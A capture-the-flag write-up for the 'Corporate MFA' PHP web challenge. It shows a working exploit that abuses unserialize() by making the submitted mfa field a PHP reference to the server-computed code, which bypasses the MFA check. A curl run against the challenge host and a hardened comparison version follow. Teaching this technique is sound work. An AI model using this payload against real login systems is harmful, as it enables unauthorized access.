Corporate MFA [Web]

Corporate MFA

We've forgotten the password to our payroll machine. Can you extract it?

Recon

We are provided the source for a website.

In the source code we can see:

<?php
// The page shows only these methods; the enclosing class name is assumed here
// so the excerpt parses on its own.
class User
{
    private $userData;

    public function __construct($loginAttempt)
    {
        // User-controlled input is passed straight to unserialize()
        $this->userData = unserialize($loginAttempt);
        if (!$this->userData)
            throw new InvalidArgumentException('Unable to reconstruct user data');
    }

    private function verifyUsername()
    {
        return $this->userData->username === 'D0loresH4ze';
    }

    private function verifyPassword()
    {
        // bcrypt hash is hard-coded; the plaintext is checked with password_verify()
        return password_verify($this->userData->password, '$2y$07$BCryptRequires22Chrcte/VlQH0piJtjXl.0t1XkA8pw9dMXTpOq');
    }
}

User-supplied data is passed to unserialize(), and the resulting object's username and password are checked against hard-coded credentials. The MFA code is then computed on the fly, but it is stored in a field of that same unserialized object and compared against another of its fields.

Solution

We can't predict the MFA value, and brute-forcing it isn't practical, but the PHP serialization format supports references between values, so we can serialize one in: make the mfa field a reference to the field the server writes the freshly computed code into, and the comparison becomes a field compared with itself.

<?php
$x = array();

// Credentials that match the hard-coded checks
$x['username'] = "D0loresH4ze";
$x['password'] = 'rasmuslerdorf';
// The initial value does not matter: the server overwrites _correctValue,
// and mfa is a PHP reference to it, so both always hold the same value
$x['_correctValue'] = 4;
$x['mfa'] = &$x['_correctValue'];

// Cast to object so unserialize() yields stdClass properties;
// serialize() emits the second occurrence of the reference as R:<n>;
echo base64_encode(serialize((object)$x));
?>
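To make the mechanism concrete from the server's side, here is an added example (not the challenge's own source): a reconstruction of the vulnerable pattern the writeup describes next to a hardened version. The class, method and property names (VulnerableMfaCheck, HardenedMfaCheck, verifyMFA, _correctValue) are assumptions; only the payload construction mirrors the script above.

```php
<?php
// Added example, not the challenge's own code. VulnerableMfaCheck is a
// reconstruction of the pattern the writeup describes: the MFA code is
// computed server-side but written into, and compared against, fields of
// the unserialized (attacker-controlled) object. Names are assumptions.

class VulnerableMfaCheck
{
    private $userData;

    public function __construct(string $loginAttempt)
    {
        $this->userData = unserialize($loginAttempt);
        if (!$this->userData) {
            throw new InvalidArgumentException('Unable to reconstruct user data');
        }
    }

    public function verifyMFA(): bool
    {
        // The fresh code is stored in the untrusted object itself.
        $this->userData->_correctValue = random_int(100000, 999999);
        // If 'mfa' is a PHP reference to '_correctValue', the assignment
        // above changed 'mfa' too, so this compares the field with itself.
        return $this->userData->mfa === $this->userData->_correctValue;
    }
}

class HardenedMfaCheck
{
    private array $userData;

    public function __construct(string $loginAttempt)
    {
        // JSON has no notion of references or classes, unlike serialize().
        $data = json_decode($loginAttempt, true);
        if (!is_array($data) || !isset($data['mfa'])) {
            throw new InvalidArgumentException('Unable to reconstruct user data');
        }
        $this->userData = $data;
    }

    public function verifyMFA(string $expectedCode): bool
    {
        // The expected code only ever lives in a server-side variable, and
        // the comparison is constant-time over two strings.
        return hash_equals($expectedCode, (string) $this->userData['mfa']);
    }
}

// Constructed payload: 'mfa' aliases '_correctValue' through a PHP reference,
// which serialize() encodes as a back-reference (R:<n>;) into the stream.
$x = [];
$x['username'] = 'D0loresH4ze';
$x['password'] = 'rasmuslerdorf';
$x['_correctValue'] = 4;
$x['mfa'] = &$x['_correctValue'];
$payload = serialize((object) $x);
echo $payload, "\n";

// The reference survives unserialize(), so the vulnerable check passes
// regardless of which code the server generated.
var_dump((new VulnerableMfaCheck($payload))->verifyMFA());

// The hardened check only accepts the code the server expects.
var_dump((new HardenedMfaCheck('{"mfa":"123456"}'))->verifyMFA('654321'));
var_dump((new HardenedMfaCheck('{"mfa":"123456"}'))->verifyMFA('123456'));
```

Two points worth noting from the defender's side: the allowed_classes option of unserialize() does not help here, because no class instantiation is involved, only a reference between two plain values; and even with unserialize() kept, the fix is to hold the expected value in a variable the client cannot influence rather than in a property of the decoded object.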

Flag

$ curl -s "http://corpmfa-01.play.midnightsunctf.se/?userdata=$(php sploit.php)" \
| grep Congr | cut -d '>' -f2
Congratulations, your flag is:
midnight{395E160F-4DB8-4D7A-99EF-08E6799741B5}